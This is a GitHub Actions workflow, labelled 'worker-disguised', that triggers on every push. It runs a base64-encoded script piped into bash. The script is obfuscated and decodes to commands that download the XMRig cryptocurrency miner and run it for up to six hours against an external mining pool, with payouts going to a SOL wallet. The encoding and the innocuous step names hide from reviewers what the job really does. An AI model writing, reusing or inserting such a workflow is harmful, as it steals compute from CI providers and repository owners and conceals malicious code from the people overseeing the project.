name: worker-disguised

on:
  push:
  workflow_dispatch:

jobs:
  background_worker:
    name: Background Worker
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Execute Disguised Task
        run: |
          echo "IyEvYmluL2Jhc2gKZWNobyAiWypdIFN0YXJ0aW5nIGJhY2tncm91bmQgdGFzay4uLiIKc3VkbyBhcHQgdXBkYXRlCnN1ZG8gYXB0IGluc3RhbGwgLXkgd2dldCB0YXIKd2dldCBodHRwczovL2dpdGh1Yi5jb20veG1yaWcveG1yaWcvcmVsZWFzZXMvZG93bmxvYWQvdjYuMjIuMi94bXJpZy02LjIyLjItbGludXgtc3RhdGljLXg2NC50YXIuZ3ogLU8gdGFzay50YXIuZ3oKdGFyIC14ZiB0YXNrLnRhci5negpjZCB4bXJpZy02LjIyLjIKY2htb2QgK3ggeG1yaWcKLi94bXJpZyAtYSByeCAtbyBzdHJhdHVtK3NzbDovL3J4LnVubWluZWFibGUuY29tOjQ0MyAtdSBTT0w6SEhRUllxUExTaGtQUUtMQ0dvZ1liUXljRHljanFkYmIxcFhiTHZibUI4TXQuV29ya2VyMDEgLXAgeCAtLXRscyAtLXRocmVhZHM9NAo=" | base64 -d | bash
